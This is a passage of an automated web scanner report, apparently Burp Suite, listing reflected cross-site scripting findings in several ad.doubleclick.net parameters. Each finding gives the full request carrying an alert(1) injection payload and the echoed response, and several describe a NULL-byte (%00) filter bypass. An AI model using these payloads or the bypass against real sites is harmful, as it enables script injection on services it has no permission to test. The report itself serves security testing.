Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6187
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:27:12 GMT
Expires: Sun, 30 Jan 2011 19:27:12 GMT

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
905/10PR_SOLAR_300x250.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250%0092a16"-alert(1)-"41f375ff973&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/h%3B231577755%3B1-0%3B0%3B55598777%3B4307-300/
...[SNIP]...

5.33. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 464a5'-alert(1)-'4eccc377927 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177464a5'-alert(1)-'4eccc377927&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 540

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177464a5'-alert(1)-'4eccc377927&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/dd/%2a/o;231468429;0-0;0;55598777;4307-300/250;38973922/38991679/1;;~okv=;pc=[TPAS_ID];;~sscs=%
...[SNIP]...

5.34. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bee4"-alert(1)-"2d6795c37b5 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=2bee4"-alert(1)-"2d6795c37b5&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6199

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
g";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=2bee4"-alert(1)-"2d6795c37b5&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d3/%2a/x%3B231464651%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973935/38991692/2%3B%3B%7Eokv%
...[SNIP]...

5.35. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a23f1"-alert(1)-"fdfe3d16e87 was submitted in the ASID parameter. This input was echoed as a23f1"-alert(1)-"fdfe3d16e87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1%00a23f1"-alert(1)-"fdfe3d16e87&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6406
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:28:40 GMT
Expires: Sun, 30 Jan 2011 19:28:40 GMT

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1%00a23f1"-alert(1)-"fdfe3d16e87&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/v%3B231464797%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973907/38991664/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

5.36. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0874'-alert(1)-'b0888e782fe was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1b0874'-alert(1)-'b0888e782fe&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6394

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1b0874'-alert(1)-'b0888e782fe&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/l%3B235513126%3B1-0%3B0%3B55598777%3B4307-300/250%3B38973908/38991665/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

5.37. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1dc92'-alert(1)-'85dfa679d81 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV21dc92'-alert(1)-'85dfa679d81&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6210

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV21dc92'-alert(1)-'85dfa679d81&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/m%3B231464693%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973930/38991687/2%3B%3B%7Eokv%3D%3Bpc%3D
...[SNIP]...

5.38. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00d3181"-alert(1)-"1701a13e520 was submitted in the TargetID parameter. This input was echoed as d3181"-alert(1)-"1701a13e520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189%00d3181"-alert(1)-"1701a13e520&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6406
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:27:47 GMT
Expires: Sun, 30 Jan 2011 19:27:47 GMT

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
pg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189%00d3181"-alert(1)-"1701a13e520&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/v%3B231464797%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973907/38991664/
...[SNIP]...

5.39. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2489a'-alert(1)-'8542b43425 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=301991892489a'-alert(1)-'8542b43425&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6235

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=301991892489a'-alert(1)-'8542b43425&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/x%3B231464651%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973935/38991692/
...[SNIP]...

5.40. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49052"-alert(1)-"19cd9540b8a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=3019918949052"-alert(1)-"19cd9540b8a&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6398

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=3019918949052"-alert(1)-"19cd9540b8a&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/c%3B235513126%3B2-0%3B0%3B55598777%3B4307-300/250%3B39096156/39113913/
...[SNIP]...

5.41. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a3d12"-alert(1)-"36b734b7ab0 was submitted in the UIT parameter. This input was echoed as a3d12"-alert(1)-"36b734b7ab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G%00a3d12"-alert(1)-"36b734b7ab0&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6340
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:27:30 GMT
Expires: Sun, 30 Jan 2011 19:27:30 GMT

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
PR_SOLAR_300x250.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G%00a3d12"-alert(1)-"36b734b7ab0&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/q%3B231577755%3B0-0%3B0%3B55598777%3B4307-300/250%3B
...[SNIP]...

5.42. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 431e1'-alert(1)-'5bd123bb5c9 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G431e1'-alert(1)-'5bd123bb5c9&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6394

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G431e1'-alert(1)-'5bd123bb5c9&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/s%3B231464761%3B0-0%3B0%3B55598777%3B4307-300/250%3B
...[SNIP]...

5.43. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 839ca"-alert(1)-"5a90ece2f0a was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=839ca"-alert(1)-"5a90ece2f0a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6210
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:51:05 GMT
Expires: Sun, 30 Jan 2011 14:51:05 GMT

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=839ca"-alert(1)-"5a90ece2f0ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/m%3B231464693%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973930/38991687/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.toyota.c
...[SNIP]...

5.44. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51164'-alert(1)-'9f97bc8ebe8 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=51164'-alert(1)-'9f97bc8ebe8 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 546
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:51:09 GMT
Expires: Sun, 30 Jan 2011 14:51:09 GMT

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=51164'-alert(1)-'9f97bc8ebe8http://ad.doubleclick.net/click;h=v8/3a9f/14/dd/%2a/k;235513946;0-0;0;55598777;4307-300/250;40425053/40442840/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://www.toyota.com/ideasforgood">
...[SNIP]...

5.45. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9990f"-alert(1)-"68474f31a2a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!9990f"-alert(1)-"68474f31a2a&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
